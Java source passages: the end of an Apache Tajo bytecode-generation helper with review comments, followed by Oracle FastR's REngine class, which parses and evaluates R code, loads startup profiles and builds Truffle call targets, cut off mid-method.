  return varId;
}

/**
 * Stores the value of the given Tajo type from the top of the stack into a
 * freshly allocated slot (reserving two slots for long/double-width types) and
 * returns the slot id.
 */
public int store(org.apache.tajo.type.Type type) {
  int varId = nextVarId;
  nextVarId += TajoGeneratorAdapter.getWordSize(type);
  switch (type.kind()) {
  case NULL_TYPE:
  case BOOLEAN:
  case CHAR:
  case INT1:
  case INT2:
  case INT4:
  case DATE: // FIX: DATE is int-backed (see convertToPrimitive/castInsn) but was previously rejected here
    methodvisitor.visitVarInsn(Opcodes.ISTORE, varId);
    break;
  case TIME:
  case TIMESTAMP:
  case INT8:
    methodvisitor.visitVarInsn(Opcodes.LSTORE, varId);
    break;
  case FLOAT4:
    methodvisitor.visitVarInsn(Opcodes.FSTORE, varId);
    break;
  case FLOAT8:
    methodvisitor.visitVarInsn(Opcodes.DSTORE, varId);
    break;
  case INTERVAL:
  case TEXT:
    // NOTE(review): PROTOBUF is object-backed elsewhere (pushDummyValue) but is
    // not accepted here — confirm whether it should join this ASTORE group.
    methodvisitor.visitVarInsn(Opcodes.ASTORE, varId);
    break;
  default:
    throw new CompilationError("Unknown data type: " + type);
  }
  return varId;
}

/** Emits the boxing call (e.g. Integer.valueOf) for the primitive of the given type. */
public void emitBoxing(EvalCodeGenContext context, org.apache.tajo.type.Type type) {
  switch (type.kind()) {
  case CHAR:
  case TEXT:
  case INT2:
    // NOTE(review): CHAR/TEXT share the Short boxing path with INT2 here even
    // though they are String-backed elsewhere — confirm this is intentional.
    context.invokeStatic(Short.class, "valueOf", Short.class, new Class[]{short.class});
    break;
  case INT4:
    context.invokeStatic(Integer.class, "valueOf", Integer.class, new Class[]{int.class});
    break;
  case INT8:
    context.invokeStatic(Long.class, "valueOf", Long.class, new Class[]{long.class});
    break;
  case FLOAT4:
    context.invokeStatic(Float.class, "valueOf", Float.class, new Class[]{float.class});
    break;
  case FLOAT8:
    context.invokeStatic(Double.class, "valueOf", Double.class, new Class[]{double.class});
    break;
  default:
    throw new RuntimeException(type + " is not supported yet");
  }
}

/** Emits the unboxing call (e.g. Integer.intValue) for the wrapper of the given type. */
public void emitUnboxing(EvalCodeGenContext context, org.apache.tajo.type.Type type) {
  switch (type.kind()) {
  case CHAR:
  case TEXT:
  case INT2:
    context.invokeVirtual(Short.class, "shortValue", short.class, new Class[]{});
    break;
  case INT4:
    context.invokeVirtual(Integer.class, "intValue", int.class, new Class[]{});
    break;
  case INT8:
    context.invokeVirtual(Long.class, "longValue", long.class, new Class[]{});
    break;
  case FLOAT4:
    context.invokeVirtual(Float.class, "floatValue", float.class, new Class[]{});
    break;
  case FLOAT8:
    context.invokeVirtual(Double.class, "doubleValue", double.class, new Class[]{});
    break;
  default:
    throw new RuntimeException(type + " is not supported yet");
  }
}

/**
 * Extends ASM's TableSwitchGenerator with the key-range metadata needed to emit
 * a table switch over an arbitrary set of case keys.
 */
public static interface SwitchCaseGenerator extends TableSwitchGenerator {
  int size();

  int min();

  int max();

  int key(int index);

  void generateCase(int index, Label end);

  void generateDefault();
}

/** An immutable (case key, result expression) pair, ordered by key. */
public static class SwitchCase implements Comparable<SwitchCase> {
  private final int index;
  private final EvalNode thanResult;

  public SwitchCase(int index, EvalNode thanResult) {
    this.index = index;
    this.thanResult = thanResult;
  }

  public int key() {
    return index;
  }

  public EvalNode result() {
    return thanResult;
  }

  @Override
  public int compareTo(SwitchCase o) {
    // FIX: was `index - o.index`, which overflows for opposite-sign keys of
    // large magnitude; Integer.compare is overflow-safe.
    return Integer.compare(index, o.index);
  }

  @Override
  public boolean equals(Object o) {
    if (this == o) return true;
    if (o == null || getClass() != o.getClass()) return false;

    SwitchCase that = (SwitchCase) o;

    if (index != that.index) return false;
    if (thanResult != null ? !thanResult.equals(that.thanResult) : that.thanResult != null) return false;

    return true;
  }

  @Override
  public int hashCode() {
    int result = index;
    result = 31 * result + (thanResult != null ? thanResult.hashCode() : 0);
    return result;
  }
}
}
oracle/fastr
36,113
com.oracle.truffle.r.engine/src/com/oracle/truffle/r/engine/REngine.java
/* * Copyright (c) 2013, 2023, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 3 only, as * published by the Free Software Foundation. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 3 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 3 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. 
*/ package com.oracle.truffle.r.engine; import static com.oracle.truffle.r.runtime.context.FastROptions.LoadProfiles; import java.io.BufferedReader; import java.io.IOException; import java.net.URI; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import java.util.stream.Collectors; import com.oracle.truffle.api.CallTarget; import com.oracle.truffle.api.CompilerAsserts; import com.oracle.truffle.api.CompilerDirectives; import com.oracle.truffle.api.CompilerDirectives.CompilationFinal; import com.oracle.truffle.api.CompilerDirectives.TruffleBoundary; import com.oracle.truffle.api.RootCallTarget; import com.oracle.truffle.api.TruffleLanguage; import com.oracle.truffle.api.dsl.UnsupportedSpecializationException; import com.oracle.truffle.api.frame.Frame; import com.oracle.truffle.api.frame.FrameDescriptor; import com.oracle.truffle.api.frame.MaterializedFrame; import com.oracle.truffle.api.frame.VirtualFrame; import com.oracle.truffle.api.interop.TruffleObject; import com.oracle.truffle.api.nodes.ExecutableNode; import com.oracle.truffle.api.nodes.ExplodeLoop; import com.oracle.truffle.api.nodes.Node; import com.oracle.truffle.api.nodes.RootNode; import com.oracle.truffle.api.profiles.ValueProfile; import com.oracle.truffle.api.source.Source; import com.oracle.truffle.api.source.SourceSection; import com.oracle.truffle.r.common.StartupTiming; import com.oracle.truffle.r.library.graphics.RGraphics; import com.oracle.truffle.r.nodes.RASTBuilder; import com.oracle.truffle.r.nodes.RASTUtils; import com.oracle.truffle.r.nodes.access.AccessArgumentNode; import com.oracle.truffle.r.nodes.access.WriteVariableNode; import com.oracle.truffle.r.nodes.access.variables.ReadVariableNode; import com.oracle.truffle.r.nodes.builtin.RBuiltinPackages; import com.oracle.truffle.r.nodes.control.AbstractBlockNode; import com.oracle.truffle.r.nodes.control.BreakException; import com.oracle.truffle.r.nodes.control.NextException; import 
com.oracle.truffle.r.nodes.function.CallMatcherNode.CallMatcherGenericNode; import com.oracle.truffle.r.nodes.function.FormalArguments; import com.oracle.truffle.r.nodes.function.FunctionDefinitionNode; import com.oracle.truffle.r.nodes.function.PromiseHelperNode; import com.oracle.truffle.r.nodes.function.RCallerHelper; import com.oracle.truffle.r.nodes.function.SaveArgumentsNode; import com.oracle.truffle.r.nodes.function.call.CallRFunctionNode; import com.oracle.truffle.r.nodes.function.call.RExplicitCallNode; import com.oracle.truffle.r.nodes.function.visibility.GetVisibilityNode; import com.oracle.truffle.r.nodes.function.visibility.SetVisibilityNode; import com.oracle.truffle.r.nodes.instrumentation.RInstrumentation; import com.oracle.truffle.r.runtime.ArgumentsSignature; import com.oracle.truffle.r.runtime.ExitException; import com.oracle.truffle.r.runtime.JumpToTopLevelException; import com.oracle.truffle.r.runtime.RArguments; import com.oracle.truffle.r.runtime.RCaller; import com.oracle.truffle.r.runtime.RError; import com.oracle.truffle.r.runtime.RErrorHandling; import com.oracle.truffle.r.runtime.RInternalError; import com.oracle.truffle.r.runtime.RParserFactory; import com.oracle.truffle.r.runtime.RProfile; import com.oracle.truffle.r.runtime.RRuntime; import com.oracle.truffle.r.runtime.RSource; import com.oracle.truffle.r.runtime.ReturnException; import com.oracle.truffle.r.runtime.RootBodyNode; import com.oracle.truffle.r.runtime.RootWithBody; import com.oracle.truffle.r.runtime.ThreadTimings; import com.oracle.truffle.r.runtime.Utils; import com.oracle.truffle.r.runtime.Utils.DebugExitException; import com.oracle.truffle.r.runtime.context.Engine; import com.oracle.truffle.r.runtime.context.RContext; import com.oracle.truffle.r.runtime.context.TruffleRLanguage; import com.oracle.truffle.r.runtime.data.RArgsValuesAndNames; import com.oracle.truffle.r.runtime.data.RAttributable; import com.oracle.truffle.r.runtime.data.RBaseObject; import 
com.oracle.truffle.r.runtime.data.RDataFactory; import com.oracle.truffle.r.runtime.data.RExpression; import com.oracle.truffle.r.runtime.data.RFunction; import com.oracle.truffle.r.runtime.data.RNull; import com.oracle.truffle.r.runtime.data.RPairList; import com.oracle.truffle.r.runtime.data.RPromise; import com.oracle.truffle.r.runtime.data.RSymbol; import com.oracle.truffle.r.runtime.data.model.RAbstractVector; import com.oracle.truffle.r.runtime.data.nodes.ShareObjectNode; import com.oracle.truffle.r.runtime.data.nodes.UnShareObjectNode; import com.oracle.truffle.r.runtime.env.REnvironment; import com.oracle.truffle.r.runtime.env.frame.FrameSlotChangeMonitor; import com.oracle.truffle.r.runtime.interop.Foreign2R; import com.oracle.truffle.r.runtime.interop.R2Foreign; import com.oracle.truffle.r.runtime.nodes.RBaseNode; import com.oracle.truffle.r.runtime.nodes.RNode; import com.oracle.truffle.r.runtime.nodes.RSourceSectionNode; import com.oracle.truffle.r.runtime.nodes.RSyntaxLookup; import com.oracle.truffle.r.runtime.nodes.RSyntaxNode; /** * The engine for the FastR implementation. Handles parsing and evaluation. There is one instance of * this class per {@link RContext}. */ final class REngine implements Engine, Engine.Timings { /** * The system time when this engine was started. */ @CompilationFinal private long startTime; /** * The accumulated time spent by child processes on behalf of this engine. */ private long[] childTimes; /** * The {@link RContext} that this engine is associated with (1-1). */ private final RContext context; /** * The unique frame for the global environment for this engine. */ @CompilationFinal private MaterializedFrame globalFrame; /** * A temporary mechanism for suppressing warnings while evaluating the system profile, until the * proper mechanism is understood. 
     */
    private boolean suppressWarnings;

    // Cached syntax node for REPL result printing; built by
    // initReplPrintSyntaxCallNode() (called from activate()).
    @CompilationFinal private RSyntaxNode replPrintCallNode;

    private REngine(RContext context) {
        this.context = context;
        this.childTimes = new long[]{0, 0};
    }

    static REngine create(RContext context) {
        return new REngine(context);
    }

    /**
     * Activates this engine: installs instrumentation, captures the global frame and start time,
     * runs one-time initialization for SHARE_NOTHING contexts, and seeds the RNG.
     */
    @Override
    public void activate(REnvironment.ContextStateImpl stateREnvironment) {
        RInstrumentation.activate(context);
        this.globalFrame = stateREnvironment.getGlobalFrame();
        this.startTime = System.nanoTime();
        if (context.getKind() == RContext.ContextKind.SHARE_NOTHING) {
            initializeNonShared();
        }
        context.stateRNG.initializeDotRandomSeed(context);
        initReplPrintSyntaxCallNode();
    }

    @Override
    public void deactivate() {
        RGraphics.dispose(context);
    }

    /**
     * One-time setup for a non-shared context: builds the "base" frame/environment, initializes
     * FFI state, loads the base package and graphics, and (when LoadProfiles is set) evaluates
     * the system/site/user profiles, optionally restores ".RData", and runs the standard
     * startup functions.
     */
    private void initializeNonShared() {
        suppressWarnings = true;
        MaterializedFrame baseFrame = RRuntime.createNonFunctionFrame("base");
        REnvironment.baseInitialize(baseFrame, globalFrame);
        context.getStateRFFI().initializeVariables(context);
        RBuiltinPackages.loadBase(context, baseFrame);
        RGraphics.initialize(context);
        if (context.getOption(LoadProfiles)) {
            StartupTiming.timestamp("Before Profiles Loaded");
            /*
             * eval the system/site/user profiles. Experimentally GnuR does not report warnings
             * during system profile evaluation, but does for the site/user profiles.
             */
            Source systemProfile = RProfile.systemProfile(context);
            try {
                parseAndEval(systemProfile, baseFrame, false);
            } catch (ParseException e) {
                throw new RInternalError(e, "error while parsing system profile from %s", systemProfile.getName());
            }
            checkAndRunStartupShutdownFunction(".OptRequireMethods", ".OptRequireMethods()");

            suppressWarnings = false;
            Source siteProfile = context.stateRProfile.siteProfile();
            if (siteProfile != null) {
                try {
                    parseAndEval(siteProfile, baseFrame, false);
                } catch (ParseException e) {
                    throw new RInternalError(e, "error while parsing site profile from %s", siteProfile.getName());
                }
            }
            Source userProfile = context.stateRProfile.userProfile();
            if (userProfile != null) {
                try {
                    // Note: evaluated in the global frame, unlike the system/site
                    // profiles above which use the base frame.
                    parseAndEval(userProfile, globalFrame, false);
                } catch (ParseException e) {
                    throw new RInternalError(e, "error while parsing user profile from %s", userProfile.getName());
                }
            }
            if (context.getStartParams().restore()) {
                // call sys.load.image(".RData", RCmdOption.QUIET
                checkAndRunStartupShutdownFunction("sys.load.image", "sys.load.image('.RData'," + (context.getStartParams().isQuiet() ? "TRUE" : "FALSE") + ')');
            }
            checkAndRunStartupShutdownFunction(".First", ".First()");
            checkAndRunStartupShutdownFunction(".First.sys", ".First.sys()");
            StartupTiming.timestamp("After Profiles Loaded");
        }
    }

    /**
     * Looks up {@code name} in the global environment and, if a function is found, parses and
     * evaluates {@code code} (an invocation of that function) in the global frame.
     */
    @Override
    public void checkAndRunStartupShutdownFunction(String name, String code) {
        // sanity check: code should be invocation of the function, so it should contain
        // "{name}(some-args)"
        assert code.contains("(") && code.contains(name);
        Object func = REnvironment.globalEnv().findFunction(name);
        if (func != null) {
            // Should this print the result?
            try {
                parseAndEval(RSource.fromTextInternal(code, RSource.Internal.STARTUP_SHUTDOWN), globalFrame, false);
            } catch (ParseException e) {
                throw new RInternalError(e, "error while parsing startup function");
            }
        }
    }

    @Override
    public Timings getTimings() {
        return this;
    }

    @Override
    public MaterializedFrame getGlobalFrame() {
        return globalFrame;
    }

    @Override
    public long elapsedTimeInNanos() {
        return System.nanoTime() - startTime;
    }

    @Override
    public long[] childTimesInNanos() {
        return childTimes;
    }

    @Override
    public long[] userSysTimeInNanos() {
        return ThreadTimings.userSysTimeInNanos();
    }

    /**
     * Parses {@code source} into top-level statements and evaluates them one at a time in
     * {@code frame}, each wrapped in its own call target. Returns the value of the last
     * statement (RNull for an empty source). Engine control-flow exceptions (debug exit,
     * jump-to-top-level, exit) are propagated; RError and internal errors are reported and
     * yield {@code null}.
     */
    @Override
    public Object parseAndEval(Source source, MaterializedFrame frame, boolean printResult) throws ParseException {
        List<RSyntaxNode> list = parseSource(source);
        try {
            Object lastValue = RNull.instance;
            for (RSyntaxNode node : list) {
                RootCallTarget callTarget = doMakeCallTarget(node.asRNode(), RSource.Internal.REPL_WRAPPER.string, printResult, true);
                lastValue = callTarget.call(frame);
            }
            return lastValue;
        } catch (ReturnException ex) {
            return ex.getResult();
        } catch (DebugExitException | JumpToTopLevelException | ExitException e) {
            throw e;
        } catch (RError e) {
            // RError prints the correct result on the console during construction
            return null;
        } catch (UnsupportedSpecializationException use) {
            String message = "FastR internal error: Unsupported specialization in node " + use.getNode().getClass().getSimpleName() + " - supplied values: " +
                            Arrays.asList(use.getSuppliedValues()).stream().map(v -> v == null ? "null" : v.getClass().getSimpleName()).collect(Collectors.toList());
            context.getConsole().printErrorln(message);
            RInternalError.reportError(use);
            return null;
        } catch (Throwable t) {
            context.getConsole().printErrorln("FastR internal error: " + t.getMessage());
            RInternalError.reportError(t);
            return null;
        }
    }

    // Parses the whole source into a list of top-level syntax nodes.
    private List<RSyntaxNode> parseSource(Source source) throws ParseException {
        RParserFactory.Parser parser = RParserFactory.getParser();
        return parser.script(source, new RASTBuilder(true), context.getLanguage());
    }

    /**
     * Parses {@code source} and returns it as a ParsedExpression: an RExpression holding one
     * language element per top-level statement, plus the builder's parse data.
     */
    @Override
    public ParsedExpression parse(Source source, boolean keepSource) throws ParseException {
        RParserFactory.Parser parser = RParserFactory.getParser();
        RASTBuilder builder = new RASTBuilder(true);
        List<RSyntaxNode> script = parser.script(source, builder, context.getLanguage());
        Object[] data = new Object[script.size()];
        for (int i = 0; i < script.size(); i++) {
            data[i] = RASTUtils.createLanguageElement(script.get(i));
        }
        return new ParsedExpression(RDataFactory.createExpression(data), builder.getParseData());
    }

    /**
     * Produces a CallTarget for {@code source}: RScript-style (syntax errors delayed to
     * execution) for non-interactive file sources, a special context-returning root for
     * {@code Engine.GET_CONTEXT}, and a regular engine root otherwise.
     */
    @Override
    public CallTarget parseToCallTarget(Source source, MaterializedFrame executionFrame) throws ParseException {
        if (source.getPath() != null && !source.isInteractive()) {
            // Use RScript semantics (delay syntax errors) for non-interactive sources from file
            return createRScriptRoot(source, executionFrame).getCallTarget();
        } else if (source == Engine.GET_CONTEXT) {
            /*
             * The "get context" operations should be executed with as little influence on the
             * actual engine as possible, therefore this special case takes care of it explicitly.
             */
            return new RootNode(context.getLanguage()) {
                @Override
                public SourceSection getSourceSection() {
                    return source.createUnavailableSection();
                }

                @Override
                public Object execute(VirtualFrame frame) {
                    // Hands the RContext itself back to the embedder as a guest value.
                    return context.getEnv().asGuestValue(context);
                }
            }.getCallTarget();
        } else {
            List<RSyntaxNode> statements = parseSource(source);
            EngineRootNode rootNode = EngineRootNode.createEngineRoot(this, context, statements, createSourceSection(source, statements), executionFrame, false);
            return rootNode.getCallTarget();
        }
    }

    /**
     * Builds a CallTarget whose execution invokes the parsed statements as a function taking
     * the given named arguments.
     */
    @Override
    public CallTarget parseToCallTargetWithArguments(Source source, List<String> argumentNames) throws ParseException {
        // We create an artificial RFunction, whose body will be the statement or statements
        // wrapped in a block node. The function will take the given arguments and will be executed
        // from an artificial RootNode via the RExplicitCallNode

        // Body
        List<RSyntaxNode> statements = parseSource(source);
        RNode[] statementsAsNode = new RNode[statements.size()];
        for (int i = 0; i < statementsAsNode.length; i++) {
            statementsAsNode[i] = statements.get(i).asRNode();
        }
        RBaseNode body;
        if (statementsAsNode.length == 1) {
            body = statementsAsNode[0];
        } else {
            body = AbstractBlockNode.create(RSourceSectionNode.INTERNAL, RSyntaxLookup.createDummyLookup(RSourceSectionNode.INTERNAL, "{", true), statementsAsNode);
        }

        // Arguments
        SaveArgumentsNode saveArguments;
        FormalArguments formals;
        AccessArgumentNode[] argAccessNodes = new AccessArgumentNode[argumentNames.size()];
        RNode[] init = new RNode[argumentNames.size()];
        for (int i = 0; i < argAccessNodes.length; i++) {
            AccessArgumentNode accessArg = AccessArgumentNode.create(i);
            argAccessNodes[i] = accessArg;
            String argName = argumentNames.get(i);
            init[i] = WriteVariableNode.createArgSave(argName, accessArg);
        }
        saveArguments = new SaveArgumentsNode(init);
        formals = FormalArguments.createForFunction(new RNode[argumentNames.size()], ArgumentsSignature.get(argumentNames.toArray(new String[0])));
        for (AccessArgumentNode access : argAccessNodes) {
            access.setFormals(formals);
        }

        // Create RFunction
        FrameDescriptor descriptor = FrameSlotChangeMonitor.createFunctionFrameDescriptor("<as.function.default>");
        FrameSlotChangeMonitor.initializeEnclosingFrame(descriptor, REnvironment.globalEnv().getFrame());
        TruffleRLanguage rLanguage = RContext.getInstance().getLanguage();
        FunctionDefinitionNode rootNode = FunctionDefinitionNode.create(rLanguage, RSyntaxNode.INTERNAL, descriptor, null, saveArguments, (RSyntaxNode) body, formals, "from AsFunction", null);
        RootCallTarget callTarget = rootNode.getCallTarget();
        RFunction fun = RDataFactory.createFunction(RFunction.NO_NAME, RFunction.NO_NAME, callTarget, null, getGlobalFrame());

        // Create RootNode that uses RExplicitCallNode to invoke that function
        RootNode root = new RootNodeWithArgs(rLanguage, fun, getGlobalFrame(), argumentNames.size());
        return root.getCallTarget();
    }

    /**
     * Root node that converts its foreign frame arguments to R values, explicitly calls the
     * wrapped RFunction in the global frame, and converts the result back to a foreign value.
     */
    private static final class RootNodeWithArgs extends RootNode {
        private final RFunction fun;
        private final MaterializedFrame globalEnv;
        @Child private RExplicitCallNode callNode = RExplicitCallNode.create();
        @Child private R2Foreign r2Foreign = R2Foreign.create();
        // One foreign-to-R converter per declared argument.
        @Children private Foreign2R[] foreign2R;

        RootNodeWithArgs(TruffleLanguage<?> language, RFunction fun, MaterializedFrame globalEnv, int argsCount) {
            super(language);
            this.fun = fun;
            this.globalEnv = globalEnv;
            foreign2R = new Foreign2R[argsCount];
            for (int i = 0; i < foreign2R.length; i++) {
                foreign2R[i] = Foreign2R.create();
            }
        }

        @ExplodeLoop
        @Override
        public Object execute(VirtualFrame frame) {
            ArgumentsSignature signature = ArgumentsSignature.empty(frame.getArguments().length);
            Object[] convertedArgs = new Object[foreign2R.length];
            for (int i = 0; i < foreign2R.length; i++) {
                convertedArgs[i] = foreign2R[i].convert(frame.getArguments()[i]);
            }
            RArgsValuesAndNames callArgs = new RArgsValuesAndNames(convertedArgs, signature);
            return r2Foreign.execute(callNode.execute(globalEnv, fun, callArgs,
RCaller.topLevel, globalEnv), true);
    }
}

/**
 * Parses {@code source} into an ExecutableNode that runs the statements in the caller's frame
 * and converts the last statement's value to a foreign (polyglot) value.
 */
@Override
public ExecutableNode parseToExecutableNode(Source source) throws ParseException {
    List<RSyntaxNode> list = parseSource(source);
    return new ExecutableNodeImpl(context.getLanguage(), list);
}

/** Executes a fixed list of parsed statements; only the last statement's result is returned. */
private static final class ExecutableNodeImpl extends ExecutableNode {
    @Child R2Foreign toForeignNode = R2Foreign.create();
    @Children final RNode[] statements;

    private ExecutableNodeImpl(TruffleLanguage<?> language, List<RSyntaxNode> list) {
        super(language);
        statements = new RNode[list.size()];
        for (int i = 0; i < statements.length; i++) {
            statements[i] = list.get(i).asRNode();
        }
    }

    @Override
    @ExplodeLoop
    public Object execute(VirtualFrame frame) {
        // Empty input evaluates to NULL.
        if (statements.length == 0) {
            return RNull.instance;
        }
        // All but the last statement are executed for effect only.
        for (int i = 0; i < statements.length - 1; i++) {
            statements[i].execute(frame);
        }
        return toForeignNode.convert(statements[statements.length - 1].execute(frame));
    }
}

/**
 * Builds a SourceSection spanning all parsed statements: the whole source if there are none,
 * the single statement's section if there is one, otherwise from offset 0 to the end of the
 * last statement.
 */
private static SourceSection createSourceSection(Source source, List<RSyntaxNode> statements) {
    // All statements come from the same "Source"
    if (statements.isEmpty()) {
        return source.createSection(0, source.getLength());
    } else if (statements.size() == 1) {
        return statements.get(0).getSourceSection();
    } else {
        Source newSource = statements.get(0).getSourceSection().getSource();
        return newSource.createSection(0, statements.get(statements.size() - 1).getSourceSection().getCharEndIndex());
    }
}

/**
 * Parses an R script line-by-line (REPL-style): lines are accumulated until they form a
 * complete statement; incomplete statements at EOF and parse errors become SyntaxErrorNodes
 * so that errors are reported at execution time with correct positions.
 */
private EngineRootNode createRScriptRoot(Source fullSource, MaterializedFrame frame) {
    URI uri = fullSource.getURI();
    String file = fullSource.getPath();
    ArrayList<RSyntaxNode> statements = new ArrayList<>(128);
    try {
        try (BufferedReader br = new BufferedReader(fullSource.getReader())) {
            int lineIndex = 1;
            int startLine = lineIndex;
            StringBuilder sb = new StringBuilder();
            // Read one line ahead so we can tell at EOF whether a statement is unfinished.
            String nextLineInput = br.readLine();
            ParseException lastParseException = null;
            while (true) {
                String input = nextLineInput;
                if (input == null) {
                    if (sb.length() != 0) {
                        // end of file, but not end of statement => error
                        statements.add(new SyntaxErrorNode(lastParseException,
                                        fullSource.createSection(startLine, 1, sb.length())));
                    }
                    break;
                }
                nextLineInput = br.readLine();
                sb.append(input);
                // Sub-source named "<file>#<firstLine>-<lastLine>" for the accumulated text.
                Source src = Source.newBuilder(RRuntime.R_LANGUAGE_ID, sb.toString(),
                                file + "#" + startLine + "-" + lineIndex).uri(uri).build();
                lineIndex++;
                List<RSyntaxNode> currentStmts = null;
                try {
                    RParserFactory.Parser parser = RParserFactory.getParser();
                    currentStmts = parser.statements(src, fullSource, startLine, new RASTBuilder(true), context.getLanguage());
                } catch (IncompleteSourceException e) {
                    // Statement continues on the next line; keep accumulating.
                    lastParseException = e;
                    if (nextLineInput != null) {
                        sb.append('\n');
                    }
                    continue;
                } catch (ParseException e) {
                    statements.add(new SyntaxErrorNode(e, fullSource.createSection(startLine, 1, sb.length())));
                }
                if (currentStmts != null) {
                    statements.addAll(currentStmts);
                }
                // we did not continue on incomplete source exception
                sb.setLength(0);
                startLine = lineIndex;
            }
        }
    } catch (IOException ex) {
        throw new RuntimeException(ex);
    }
    return EngineRootNode.createEngineRoot(this, context, statements,
                    createSourceSection(fullSource, statements), frame, true);
}

/**
 * Evaluates each element of an RExpression in {@code envir}; symbols are looked up (missing
 * ones raise ARGUMENT_MISSING), language objects are evaluated, other values pass through.
 * Returns the value of the last element.
 */
@Override
@TruffleBoundary
public Object eval(RExpression exprs, REnvironment envir, Object callerFrame, RCaller caller, RFunction function) {
    Object result = RNull.instance;
    for (int i = 0; i < exprs.getLength(); i++) {
        Object obj = exprs.getDataAt(i);
        if (obj instanceof RSymbol) {
            String identifier = ((RSymbol) obj).getName();
            result = ReadVariableNode.lookupAny(identifier, envir.getFrame(), false);
            caller.setVisibility(true);
            if (result == null) {
                throw RError.error(RError.SHOW_CALLER, RError.Message.ARGUMENT_MISSING, identifier);
            }
        } else if ((obj instanceof RPairList && ((RPairList) obj).isLanguage())) {
            result = eval((RPairList) obj, envir, callerFrame, caller, function);
        } else {
            result = obj;
        }
    }
    return result;
}

/** Evaluates a single language object (pair list) in the given environment. */
@Override
@TruffleBoundary
public Object eval(RPairList expr, REnvironment envir, Object callerFrame, RCaller caller, RFunction function) {
    assert expr.isLanguage();
    return expr.getClosure().eval(envir, callerFrame, caller, function);
}

/** Forces a promise on the slow path (no Truffle compilation). */
@Override
public Object evalPromise(RPromise promise) {
    return PromiseHelperNode.evaluateSlowPath(promise);
}

/**
 * Evaluates each element of an RExpression in {@code frame}; language objects are evaluated,
 * other values pass through. Returns the value of the last element (or null for an empty
 * expression — note the initial value differs from the REnvironment overload above, which
 * starts with RNull).
 */
@Override
public Object eval(RExpression expr, MaterializedFrame frame) {
    CompilerAsserts.neverPartOfCompilation();
    Object result = null;
    for (int i = 0; i < expr.getLength(); i++) {
        result = expr.getDataAt(i);
        if ((result instanceof RPairList && ((RPairList) result).isLanguage())) {
            RPairList lang = (RPairList) result;
            result = eval(lang, frame);
        }
    }
    return result;
}

/** Evaluates a single language object directly in a materialized frame. */
@Override
public Object eval(RPairList expr, MaterializedFrame frame) {
    assert expr.isLanguage();
    CompilerAsserts.neverPartOfCompilation();
    return expr.getClosure().eval(frame);
}

/**
 * Calls an RFunction on the slow path. If {@code frame} is null the current R frame is used
 * (falling back to the global environment, e.g. when called from the parser on error).
 * Arguments are match-ordered against the formals; promises are optionally forced first.
 */
@Override
@TruffleBoundary
public Object evalFunction(RFunction func, MaterializedFrame frame, RCaller caller, boolean evalPromises, ArgumentsSignature names, Object... args) {
    assert frame == null || caller != null;
    MaterializedFrame actualFrame = frame;
    if (actualFrame == null) {
        Frame current = Utils.getActualCurrentFrame();
        if (current == null || !RArguments.isRFrame(current)) {
            // special case, e.g. in parser and an error is thrown
            actualFrame = REnvironment.globalEnv().getFrame();
        } else {
            actualFrame = current.materialize();
        }
    }
    // Unnamed signature when no names were supplied.
    ArgumentsSignature argsSignature = names == null ? ArgumentsSignature.empty(args.length) : names;
    RArgsValuesAndNames reorderedArgs = CallMatcherGenericNode.reorderArguments(args, func, argsSignature, RError.NO_CALLER);
    Object[] newArgs = reorderedArgs.getArguments();
    if (evalPromises) {
        for (int i = 0; i < newArgs.length; i++) {
            Object arg = newArgs[i];
            if (arg instanceof RPromise) {
                newArgs[i] = PromiseHelperNode.evaluateSlowPath((RPromise) arg);
            }
        }
    }
    // Synthesize a caller from the ORIGINAL (pre-reorder) arguments when none was provided.
    RCaller rCaller = caller == null
                    ? RCaller.create(actualFrame, RCallerHelper.createFromArguments(func,
                                    new RArgsValuesAndNames(args, argsSignature)))
                    : caller;
    return CallRFunctionNode.executeSlowpath(func, rCaller, actualFrame, newArgs, reorderedArgs.getSignature(), null);
}

/** Wraps a promise body in an anonymous, non-printing, non-top-level call target. */
@Override
public RootCallTarget makePromiseCallTarget(RNode body, String funName) {
    return doMakeCallTarget(body, funName, false, false);
}

/**
 * Creates an anonymous function, with no arguments to evaluate {@code body}, optionally
 * printing any result. The {@code callTarget} expects exactly one argument: the {@code frame}
 * that the body should be executed in.
 */
@TruffleBoundary
RootCallTarget doMakeCallTarget(RNode body, String description, boolean printResult, boolean topLevel) {
    return new AnonymousRootNode(this, body, description, printResult, topLevel).getCallTarget();
}

/**
 * An instance of this node is called with the intention to have its execution leave a footprint
 * behind in a specific frame/environment, e.g., during library loading, commands from the
 * shell, or R's {@code eval} and its friends. The call target must be invoked with one
 * argument, namely the {@link Frame} to be side-effected. Execution will then proceed in the
 * context of that frame. Note that passing only this one frame argument, strictly spoken,
 * violates the frame layout as set forth in {@link RArguments}. This is for internal use only.
 */
private static final class AnonymousRootNode extends RootNode implements RootWithBody {

    private final ValueProfile frameTypeProfile = ValueProfile.createClassProfile();
    private final String description;
    // When true (implies topLevel), visible results are printed REPL-style.
    private final boolean printResult;
    private final boolean topLevel;
    private final boolean suppressWarnings;

    @Child private RootBodyNode body;
    @Child private GetVisibilityNode visibility = GetVisibilityNode.create();
    @Child private SetVisibilityNode setVisibility = SetVisibilityNode.create();

    protected AnonymousRootNode(REngine engine, RNode body, String description, boolean printResult, boolean topLevel) {
        super(engine.context.getLanguage());
        this.suppressWarnings = engine.suppressWarnings;
        this.body = new AnonymousBodyNode(body);
        this.description = description;
        this.printResult = printResult;
        this.topLevel = topLevel;
    }

    @Override
    public SourceSection getSourceSection() {
        return getBody().getSourceSection();
    }

    @Override
    @TruffleBoundary
    public boolean isInternal() {
        return RSyntaxNode.isInternal(getBody().getLazySourceSection());
    }

    /** The single argument is the frame to execute in (see class comment above). */
    private VirtualFrame prepareFrame(VirtualFrame frame) {
        return (MaterializedFrame) frameTypeProfile.profile(frame.getArguments()[0]);
    }

    @Override
    public Object execute(VirtualFrame frame) {
        assert frame.getArguments().length == 1;
        VirtualFrame vf = prepareFrame(frame);
        Object result = null;
        try {
